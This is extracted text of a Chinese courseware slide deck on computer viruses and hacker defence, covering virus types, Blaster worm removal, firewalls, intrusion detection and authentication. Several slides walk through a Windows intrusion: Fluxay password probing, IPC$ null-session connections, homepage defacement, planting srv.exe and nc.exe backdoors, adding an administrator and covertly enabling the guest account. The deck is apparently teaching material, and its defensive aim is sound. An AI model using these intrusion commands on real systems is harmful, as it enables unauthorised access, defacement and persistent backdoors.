計(jì)算機(jī)病毒與黑客防范ppt課件

《計(jì)算機(jī)病毒與黑客防范ppt課件》由會(huì)員分享，可在線閱讀，更多相關(guān)《計(jì)算機(jī)病毒與黑客防范ppt課件（23頁(yè)珍藏版）》請(qǐng)?jiān)谘b配圖網(wǎng)上搜索。

計(jì)算機(jī)維護(hù)技術(shù) 1 第9章 計(jì)算機(jī)病毒與黑客防范 9 1計(jì)算機(jī)病毒解析 1 計(jì)算機(jī)病毒的來(lái)源 一方面計(jì)算機(jī)用處很大 另一方面計(jì)算機(jī)也存在很多可攻擊的地方即安全漏洞 所以出現(xiàn)了計(jì)算機(jī)病毒 2 計(jì)算機(jī)病毒 指能夠通過(guò)自身復(fù)制進(jìn)行傳染 進(jìn)而起破壞作用的一種計(jì)算機(jī)程序 這類程序的主要特征如下 程序性 傳染性 欺騙性 危害性 隱蔽性 潛伏性 精巧性 3 計(jì)算機(jī)病毒的分類 引導(dǎo)性病毒 文件性病毒 網(wǎng)絡(luò)型病毒 2 9 2計(jì)算機(jī)病毒 4 病毒程序模型 包括三個(gè)部分 即安裝模塊 感染模塊和破壞模塊 5 計(jì)算機(jī)病毒的規(guī)律和現(xiàn)象 內(nèi)存少了1KB 一般病毒程序在內(nèi)存中占用高端1K的空間 該空間DOS操作系統(tǒng)管不了 病毒修改內(nèi)存空間大小標(biāo)記單位 0413 單元中的內(nèi)容 造成DOS操作系統(tǒng)就認(rèn)為機(jī)器是少1KB內(nèi)存空間大小 引導(dǎo)扇區(qū)被搶占 硬盤包括主引導(dǎo)扇區(qū)和DOS引導(dǎo)扇區(qū)軟盤只有DOS引導(dǎo)扇區(qū) 文件被加長(zhǎng) 文件性病毒寄生在可執(zhí)行文件上 如COM或EXE文件 啟動(dòng)程序被修改 3 9 3計(jì)算機(jī)病毒的防范 1 使用OFFICESCAN軟件殺毒2 使用江民殺毒王殺毒3 使用瑞星殺毒軟件清除病毒 4 清除沖擊波病毒實(shí)例 沖擊波病毒是在2003年8月席卷全球計(jì)算機(jī)網(wǎng)絡(luò)的一種計(jì)算機(jī)病毒當(dāng)時(shí)幾乎造成60 的計(jì)算機(jī)處于癱瘓 該病毒的特點(diǎn)如下 病毒名稱 Worm Blaser發(fā)作時(shí)間 隨機(jī) 病毒類型 蠕蟲病毒傳播途徑 網(wǎng)絡(luò) RPC漏洞 依賴系統(tǒng) Windows2000 XP病毒尺寸 6176字節(jié) 發(fā)作現(xiàn)象 沖擊疲病毒是利用微軟公司在2003年7月21日公布的RPC漏洞進(jìn)行傳播 有RPC服務(wù)且沒(méi)有打安全補(bǔ)丁的計(jì)算機(jī)都有 4 9 4 清除沖擊波病毒實(shí)例 漏洞 涉及WIN2000 XP Server2003 計(jì)算機(jī)感染該病毒后 系統(tǒng)資源被耗盡 有時(shí)會(huì)彈出RPC服務(wù)終止對(duì)話框 反復(fù)得啟動(dòng) 不能收發(fā)郵件 不能正常復(fù)制和粘貼文件 無(wú)法正常瀏覽網(wǎng)頁(yè) DNS和IIS服務(wù)遭到非法拒絕等 沖擊波病毒的清除1 DOS環(huán)境下清除用DOS系統(tǒng)盤啟動(dòng) 再進(jìn)入Windows目錄下查找msblast exe刪除 2 安全模式下清除f啟動(dòng)Windows進(jìn)入安全模式 搜索C盤 查找msblast exe文件 刪除 5 9 5 清除沖擊波病毒實(shí)例 3 給系統(tǒng)打補(bǔ)丁 進(jìn)入微軟網(wǎng)站下載系統(tǒng)補(bǔ)丁Windows2000下載地址 6 9 6 黑客入侵解析 黑客概念 是計(jì)算機(jī)網(wǎng)絡(luò)病毒程序 現(xiàn)指那些未經(jīng)許可就闖入別人計(jì)算機(jī)系統(tǒng)的人 黑客入侵術(shù) 1 密碼破解術(shù) 通過(guò)網(wǎng)絡(luò)監(jiān)聽(tīng)用戶密碼 利用專門軟件破解 獲得服務(wù)上的shadow密碼文件再破解 2 特洛伊木馬術(shù) 常用的木馬軟件有網(wǎng)絡(luò)公牛 Netbull 網(wǎng)絡(luò)神偷 netthief WAY2 4 火鳳凰 無(wú)賴小子 廣外女生 聰明基因 netspy 網(wǎng)絡(luò)精靈 木馬往往躲藏在windows的系統(tǒng)目錄下 偽裝成一個(gè)文本文件和網(wǎng)頁(yè)文件 通過(guò)端口與外界聯(lián)系 或者改變文件關(guān)聯(lián)方式達(dá)到自啟動(dòng) 從而泄漏信息 3 監(jiān)聽(tīng)術(shù) 攔截網(wǎng)絡(luò)接口獲取密碼如sniffer軟件 7 9 7 黑客入侵解析 4 電子郵件技術(shù) 佯稱自己是系統(tǒng)管理員 給用戶發(fā)送郵件要求用戶更改密碼或在正常的附件中加載木馬程序 5 系統(tǒng)漏洞術(shù) 利用操作系統(tǒng)和應(yīng)用程序的漏洞 6 默認(rèn)帳戶術(shù) 如unix主機(jī)都有FTP和GUEST帳戶 8 9 8 網(wǎng)絡(luò)入侵實(shí)例解析 1 從因特網(wǎng)上下載流光 Fluxay V4 71FORWinNT 2000 XP 操作演示 如何探測(cè)電子郵件 電子郵件系統(tǒng)一般建立在網(wǎng)絡(luò)服務(wù)器上 如電子郵件地址xxx 表示該電子郵件存儲(chǔ)在網(wǎng)站上 其域名為P探測(cè) 打開(kāi)軟件 選pop3主機(jī) 右擊在彈出式菜單中選擇 編輯 然后 添加 使用字典 在主畫面中選擇pop3主機(jī) 右擊 編輯 從列表中添加 一個(gè)字典文件 探測(cè) 選擇pop3主機(jī) 右擊 探測(cè)用戶信息 9 9 9 網(wǎng)絡(luò)入侵實(shí)例解析 利用IPC進(jìn)行探測(cè) IPC 是共享 命名管道 的資源 它對(duì)于程序間的通信很重要 在遠(yuǎn)程管理計(jì)算機(jī)和查看計(jì)算機(jī)的共享資源時(shí)使用 利用IPC 可以與目標(biāo)主機(jī)建立一個(gè)空的連接 無(wú)需用戶名和密碼 而利用這個(gè)空連接就可以得到目標(biāo)主機(jī)上的用戶列表 并配合字典進(jìn)行密碼嘗試 例探測(cè)207 188 221 1 207 188 222 255 確定探測(cè)地址 選探測(cè) 選擇掃描pop3 ftp nt sql主機(jī)在主機(jī)掃描范圍輸入207 188 221 1 207 188 222 255類型選擇 NT 98 選擇IPC 主機(jī) 右擊 檢測(cè)主機(jī)類型看結(jié)果 掃描到開(kāi)放的主機(jī)后 在Windows2k的cmd exe下鍵入Netuse IP地址 IPC 密碼 user 用戶名 10 9 10 網(wǎng)絡(luò)入侵實(shí)例解析 連接成功后 可以更換對(duì)方Web主頁(yè) 鍵入如下 Copyc index htm IP地址 C inetpub wwwroot其中C inetpub wwwroot是對(duì)方主機(jī)主頁(yè)目錄 留后門 如果想在以后登錄該服務(wù)器 可以設(shè)置telnet服務(wù) 操作步驟如下 上傳srv exe程序 將流光目錄tool文件下的srv exe復(fù)制到C盤 將srv exe復(fù)制到對(duì)方服務(wù)器system32目錄Copyc srv exe IP地址 admin 11 9 11網(wǎng)絡(luò)入侵實(shí)例解析 獲取進(jìn)程 鍵入如下命令 Nettime IP地址得到時(shí)間 記住這個(gè)時(shí)間 在稍后的時(shí)間啟動(dòng)srv exe 鍵入At ip地址啟動(dòng)telnet的時(shí)間srv exe這時(shí)用srv exe打開(kāi)的默認(rèn)端口是99 完成種木馬 再次登錄 鍵入如下命令telnetIP地址99就可再訪問(wèn)該服務(wù)器 直接到對(duì)方服務(wù)器的c winnt system32 目錄下 這是黑客入侵的全過(guò)程 12 9 12 網(wǎng)絡(luò)入侵的常用命令 Net命令1 假設(shè)對(duì)方的IP地址是127 0 0 1 獲取的用戶名是abc 密碼是123456 利用IPC 連接 登錄 退出 IPC 是一種共享空連接 連接并登錄Netuse 127 0 0 1 ipc 123456 user abc 退出Netuse 127 0 0 1 ipc delte利用SA用戶增加用戶 用戶名bcd 密碼123456一般SA用戶相當(dāng)系統(tǒng)的超級(jí)用戶 創(chuàng)建用戶 Netusebcd123456 add加入administrator組 Netlocalgroupadministratorbcd add設(shè)置guset默認(rèn)用戶 13 9 13網(wǎng)絡(luò)入侵的常用命令 Guest是NT默認(rèn)用戶 無(wú)法刪除 可激活它并加上密碼激活guest用戶 Netuserguest active yes增加密碼 Netuserguest123456一旦這樣做后 就可以使用guest用戶自由登錄 并且不被發(fā)現(xiàn) AT命令 此命令的功能是在特定的日期和時(shí)間運(yùn)行某些命令和程序 種木馬假設(shè)已經(jīng)登錄了對(duì)方主機(jī) 鍵入如下命令 Nettime 127 0 0 1這時(shí)系統(tǒng)返回一個(gè)時(shí)間 如12 1 同時(shí)得到新的作業(yè)ID 1 14 9 14網(wǎng)絡(luò)入侵的常用命令 啟動(dòng)一個(gè)程序 鍵入at 127 0 0 112 3nc exe在12 3時(shí)間執(zhí)行nc exe程序 執(zhí)行該程序 對(duì)方99端口就開(kāi)放 這就在對(duì)方機(jī)器上種下一個(gè)木馬 telnet 遠(yuǎn)程登錄命令 在正常情況下需要用戶名和密碼 如果利用種下的木馬 可以真接打開(kāi)端口 如telnet127 0 0 199FTP 是文件傳輸命令例設(shè)FTP服務(wù)器為用戶名為abc 密碼為123 用FTP命令實(shí)現(xiàn)文件雙向傳輸 登錄 將本機(jī)c index htm文件傳送到對(duì)方d 下Putc index htmd 將對(duì)方d index htm文件傳送到本機(jī)c 下Getd index htmc 15 9 15網(wǎng)絡(luò)入侵的常用命令 Netstar 顯示網(wǎng)絡(luò)連接 路由表和網(wǎng)絡(luò)接口信息 可以讓用戶得知目前有哪些網(wǎng)絡(luò)連接正在運(yùn)作 在本機(jī)上使用netstar命令 netstar 16 9 16黑客防范技術(shù) 1 基本防范方法將磁盤分區(qū)轉(zhuǎn)換為NTFS格式 遠(yuǎn)程訪問(wèn) RAS 防范訪問(wèn)單一服務(wù)器 限定所有遠(yuǎn)程用戶訪問(wèn)單一服務(wù)器使用其他協(xié)議 RAS服務(wù)器一般都使用TCP IP協(xié)議 而TCP IP協(xié)議比較容易受攻擊 改為IPX SPX和netbeui 用戶地址綁定 將用戶名 密碼 網(wǎng)卡和計(jì)算機(jī)名綁定 及時(shí)更新安全漏洞補(bǔ)救程序 2 防火墻技術(shù)防火墻是一種用來(lái)加強(qiáng)網(wǎng)絡(luò)之間訪問(wèn)控制的特殊網(wǎng)絡(luò)互聯(lián)設(shè)備 放在內(nèi)網(wǎng)和外網(wǎng)之間 根本任務(wù)是阻止外網(wǎng)用戶非法入侵 但不能阻止外網(wǎng)和內(nèi)網(wǎng)之間的正常通信 17 9 17黑客防范技術(shù) 1 通常使用的安全控制手段有 包過(guò)濾 狀態(tài)檢測(cè) 代理服務(wù) 代理服務(wù)是運(yùn)行于內(nèi)部網(wǎng)絡(luò)和外部網(wǎng)絡(luò)之間的主機(jī)之上的一種應(yīng)用 當(dāng)用戶需要訪問(wèn)代理服務(wù)器另一側(cè)的主機(jī)時(shí) 對(duì)符合安全規(guī)則的連接 代理服務(wù)器會(huì)代替主機(jī)響應(yīng) 并重新各主機(jī)發(fā)出一個(gè)相同的請(qǐng)求 當(dāng)此連接請(qǐng)求得到回應(yīng)度建立起連接之后 內(nèi)部主機(jī)同外部主機(jī)之間的通信將通過(guò)代理程序映射相應(yīng)邊接實(shí)現(xiàn) 18 9 18黑客防范技術(shù) 2 防火墻產(chǎn)品 分為硬件防火墻和軟件防火墻華堂防火墻 一種智能過(guò)濾型軟硬件一體化防御系統(tǒng)網(wǎng)絡(luò)衛(wèi)士防火墻瑞星軟件防火墻 提供網(wǎng)絡(luò)實(shí)時(shí)過(guò)濾監(jiān)控功能 可防御各種木馬的惡意攻擊 如BO 冰河 沖擊波病毒主要是通過(guò)TCP的135 4444端口和UDP的99端口進(jìn)行攻擊 19 9 19黑客防范技術(shù) 3 瑞星防火墻設(shè)置舉例 下載瑞星防火墻軟件演示 4 網(wǎng)絡(luò)入侵檢測(cè) 是對(duì)防火墻的合理補(bǔ)充 幫助系統(tǒng)對(duì)網(wǎng)絡(luò)攻擊 擴(kuò)展了系統(tǒng)管理員的安全管理能力 從網(wǎng)絡(luò)中若干關(guān)鍵點(diǎn)收集信息 看網(wǎng)絡(luò)中是否有違安全策略的行為和遭到襲擊的跡象 是典型的防黑客攻擊技術(shù) 代表產(chǎn)品有華依網(wǎng)絡(luò)入侵檢測(cè)系統(tǒng) 20 9 20VPN虛擬專用網(wǎng) 1 VPN虛擬專用網(wǎng)組建2 VPN示意圖 21 9 21網(wǎng)絡(luò)安全體系結(jié)構(gòu) 網(wǎng)絡(luò)安全體系結(jié)構(gòu) 從層次上講包括網(wǎng)絡(luò)級(jí)安全 應(yīng)用級(jí)安全 系統(tǒng)級(jí)安全和管理安全 解決網(wǎng)絡(luò)安全常用手段 防病毒軟件 防火墻 入侵檢測(cè) 虛擬網(wǎng)絡(luò) VLAN 指根據(jù)交換機(jī)端口 指靜態(tài)虛擬局域網(wǎng) 或MAC地址 動(dòng)態(tài)虛擬局域網(wǎng) 將主機(jī)和相關(guān)客戶機(jī)劃分為一組 形成虛擬局域網(wǎng) 虛擬專用網(wǎng) VPN 是企業(yè)網(wǎng)在因特網(wǎng)上的延伸 通過(guò)一個(gè)專有通道在公共網(wǎng)絡(luò)上創(chuàng)建一個(gè)安全的專的連接 加密技術(shù) 加密網(wǎng)絡(luò)不依賴于網(wǎng)絡(luò)傳輸途徑 是通過(guò)對(duì)數(shù)據(jù)本身的加密來(lái)保障網(wǎng)絡(luò)安全性 22 9 22網(wǎng)絡(luò)安全體系結(jié)構(gòu) 認(rèn)證技術(shù) 解決網(wǎng)絡(luò)通信過(guò)程中通信雙方的身份認(rèn)可 常用認(rèn)證方法 User assword認(rèn)證 常用于操作系統(tǒng)登錄 telnet 此認(rèn)證方式不加密 容易被監(jiān)聽(tīng)和解密 使用摘要算法認(rèn)證 adius 拔號(hào)認(rèn)證協(xié)議 OSPf 路由協(xié)議 ecurityprotocol等均使用共享的SecurityKey 加上摘要算法 基于 認(rèn)證 使用公開(kāi)密鑰體系進(jìn)行認(rèn)證和加密 安全性很高 應(yīng)用在電子郵件 應(yīng)用服務(wù)器訪問(wèn) 客戶認(rèn)證 防火墻認(rèn)證 涉及到繁重的證書管理任務(wù) 數(shù)字簽名 可驗(yàn)證發(fā)送者身份和消息完整性 消息隨數(shù)字簽名一同發(fā)送 對(duì)消息的任何修改要驗(yàn)證數(shù)字簽名時(shí)都被發(fā)現(xiàn) 偽造數(shù)字簽名從計(jì)算機(jī)能力上講是不可行的 23